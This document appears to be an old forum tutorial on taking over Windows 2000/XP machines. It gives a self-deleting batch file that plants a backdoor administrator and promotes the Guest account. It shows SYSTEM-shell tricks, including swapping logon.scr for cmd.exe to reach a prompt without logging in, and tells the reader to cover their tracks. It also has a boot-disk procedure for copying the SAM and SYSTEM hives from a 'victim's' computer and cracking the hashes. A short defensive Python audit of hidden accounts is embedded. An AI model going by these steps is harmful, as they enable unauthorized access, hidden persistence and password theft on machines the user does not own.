Please don't misuse this article. It is meant for educational purposes only, or for helping
those who have lost their password.
Before you start, you must know how to view all of the user accounts.
To view all of the user accounts:
1) While logged onto the computer, click on Start>Run> and type in CMD.
2) From the command prompt window, type in net user. This will show you
every local account on the computer, whether or not it is hidden from the Welcome screen.
OK. Then try these methods.
METHOD 1:
Change an account password:
1) While logged onto the computer with an account that has administrative rights,
click on Start>Run> and type in CMD.
2) Type in net user, then the name of the account, then * and press Enter.
Here's an example: let's say the user or administrator name is Joe Smith, so type
net user "Joe Smith" *
Put the name in quotes if it contains spaces.
3) From there it will ask for a new password.
Type in your new password (type very carefully:
the command window won't display what you type) and once more to confirm it.
If you get the message "The command completed successfully." you're all set!
Note that this is a reset, not a change: the account loses anything keyed to its old password,
in particular EFS-encrypted files and saved credentials. The same is true of every method on this page.
METHOD 2:
Turn "GUEST" into an administrator with a batch file.
This only works if you run it from an account that is already an administrator: net user and
net localgroup refuse to add accounts or change group membership from a Guest or limited
account, so the script grants nothing by itself. What it does is create a new administrator
account of your choosing, then enable the built-in Guest account, give it the password 420,
take it out of the Guests group and put it into Administrators, so Guest becomes a second
administrator back door. The last line deletes the batch file itself.
@echo off
title Please wait...
cls
net user Username Password /add
net localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /delete
net localgroup Administrators Guest /add
del %0
Replace Username and Password with the account name and password you want.
Copy this to Notepad and save the file as "Guest2admin.bat";
then you can double-click the file to execute it, or run it from the cmd window.
METHOD 3:
Become the 'SYSTEM USER', because 'Administrator' does not have full control of the system.
For your information, the Local System account (shown as SYSTEM in Task Manager) is more
powerful than Administrator: it is what services and Winlogon run as, it can open folders and
registry keys that deny Administrators by default (System Volume Information, the SAM and
SECURITY hives), and it can kill other SYSTEM-owned processes.
Two caveats before you start. This method only works from an account that is already an
administrator, because the Task Scheduler service refuses jobs from anyone else; going from
Administrator to SYSTEM is not a boundary Windows defends. And it only works on Windows 2000,
XP and Server 2003: Vista and later removed the /interactive switch and isolate services in
session 0, so the scheduled prompt never reaches your desktop.
1- Open Command Prompt and type "at" on its own. If it responds with an "Access denied" error,
the Task Scheduler service is stopped or you are not an administrator, and you are out of luck
with this method; if it responds with "There are no entries in the list" (or sometimes with
entries already in the list) then we are good.
2- Look at the clock and type in "at HH:MM /interactive cmd.exe", with a time one or two minutes
ahead in 24-hour format, for example "at 13:16 /interactive cmd.exe".
3- When the system clock reaches the time you set, a new Command Prompt will magically appear.
The difference is that this one is running with SYSTEM privileges, because it was started by
the Task Scheduler service, which runs under the Local System account. You'll notice that the
title bar reads "svchost.exe" (short for Service Host) instead of "cmd.exe". Now that we have
our SYSTEM command prompt, you may close the old one.
4- Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt.
Go to the "Processes" tab, select "explorer.exe" and click "End Process". Your desktop and all
open folders should disappear, but the SYSTEM command prompt should still be there.
5- At the SYSTEM command prompt, type in "explorer.exe".
6- A desktop will come back up, but it isn't your desktop. Go to the Start menu and look at
the user name: it should say "SYSTEM". Also open Task Manager again, and you'll notice that
explorer.exe is now running as SYSTEM.
What to do now
Now that we have SYSTEM access, everything that we run from our Explorer process will have it
too: browsers, games, etc. You also have the ability to reset the administrators' passwords
with net user, and to kill other processes owned by SYSTEM. You can do anything on the
machine, the equivalent of root; you are now God of the Windows machine.
METHOD 4:
Show the built-in Administrator account on the XP Welcome screen.
Start the Registry Editor (Start>Run> and type in regedit) and go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value, and name the new value Administrator.
Double-click this new value and enter 1 as its Value data. Close the Registry Editor
and restart (logging off is enough). The Welcome screen now lists Administrator.
This changes no password; it only makes the account selectable, which helps when the
built-in Administrator is the account whose password you know.
The same key works the other way round: a DWORD of 0 hides an account from the Welcome
screen and from the User Accounts control panel, though not from net user, so anyone
auditing a machine should compare this key against the output of net user.
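As an added example that is not part of the original post, here is a small Python audit of that key. It assumes the key was first exported with reg export (the one command shown in the comment) and parses a constructed sample of that export; the account names helpdesk and svc_backup are made up.

```python
import re

# Constructed sample of what this command exports on an XP box (reg.exe writes
# UTF-16 with a BOM; open the real file with encoding="utf-16" before parsing):
#   reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" userlist.reg
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"Administrator"=dword:00000001
"helpdesk"=dword:00000000
"svc_backup"=dword:00000000
"""

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
                r"\CurrentVersion\Winlogon\SpecialAccounts\UserList")
_DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_userlist(reg_text):
    """Map account name -> DWORD for every value under the UserList key.
    1 means shown on the Welcome screen, 0 means hidden from it."""
    entries = {}
    in_key = False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            # A new [key] header; only values under UserList count.
            in_key = line[1:-1].lower() == USERLIST_KEY.lower()
            continue
        if in_key:
            m = _DWORD_LINE.match(line)
            if m:
                entries[m.group(1)] = int(m.group(2), 16)
    return entries


def hidden_accounts(reg_text):
    """Accounts with value 0: hidden from the Welcome screen and the User
    Accounts applet, but still listed by 'net user'. Anything here that an
    administrator did not add deliberately deserves a second look."""
    return sorted(n for n, v in parse_userlist(reg_text).items() if v == 0)


def shown_accounts(reg_text):
    """Accounts explicitly re-shown, as the Administrator edit above does."""
    return sorted(n for n, v in parse_userlist(reg_text).items() if v != 0)


if __name__ == "__main__":
    print("shown on Welcome screen  :", shown_accounts(SAMPLE_REG))
    print("hidden from Welcome screen:", hidden_accounts(SAMPLE_REG))
```

Run hidden_accounts on the real export and compare the result against net user: an account that net user lists and this key hides was put there by someone.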
METHOD 5:
This is a cool little trick using the logon screen saver. Log in (as an administrator, since
you need to write to system32), go to your command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
copy cmd.exe logon.scr
exit
So what you just told Windows to do is back up the command program and the logon screen
saver into temphack, then put a copy of cmd.exe in place of logon.scr (use copy rather than
rename for that last step, or cmd.exe disappears from system32). On Windows 2000 and XP,
Winlogon runs that screen saver at the logon screen under the Local System account, so log
off, wait for the screen saver timeout (about ten minutes by default), and instead of a screen
saver you get a SYSTEM command prompt without logging in. One caveat: Windows File Protection
may silently restore the original logon.scr from %SystemRoot%\system32\dllcache, in which case
the screen saver just runs normally and you need another method.
When the prompt appears, enter net user followed by the account name and the new password.
So if the admin user name is Doug and you want the password 1234, you would enter
"net user Doug 1234", and now you've changed the admin password to 1234.
Log in, do what you want to do, then put the original back with "copy /y temphack\logon.scr
logon.scr" and delete the temphack folder to cover your tracks.
METHOD 6:
By using reboot file.
Here is it:
1. You should have your own computer at home and can use a cd writer.
2. Use nero 7 downloadable from net
3. Create bootable disk.
4. Bring the disk to your victims computer.
5. Boot from it.(it mounts NTFS)
6. Type “c:” enter
7. Type “dir” enter
8. If you see WINDOWS ok fine, we are good.
But if not you have to try other drive letters and do the same process (you can try d: or e:
until yo’ll find WINDOWS).
9. If succeed type “copy c:\windows\system32\config\SAM c:\folder” (this copy SAM & create
folder in c:)
10. Repeat but change “SAM” to “SYSTEM”.
11. Remember use “c:” only if you seen WINDOWS in “c:” but if not use the drive letter that has.
12. Get Offline Registry Editor from Pnordhal downloadable from net.
13. Follow instructions to use it. It will blank your administrator password.
14. Log on using administrator blank password.
15. Non-domain users press ctrl+alt+del (press del twice, del only).
16. Have a copy of SAMInside. Follow instructions using SAM file.(from internet)
17. Export users to PWDump file.
18. Have a copy of LOpthcrack 5
19. Follow instructions.crack passwd using importing PWDump. Browse the file and follow the
instructions, that’s it.
You have your administrator password and hack your own PC and bring back the original administrator password from users options.
This is only for local computers.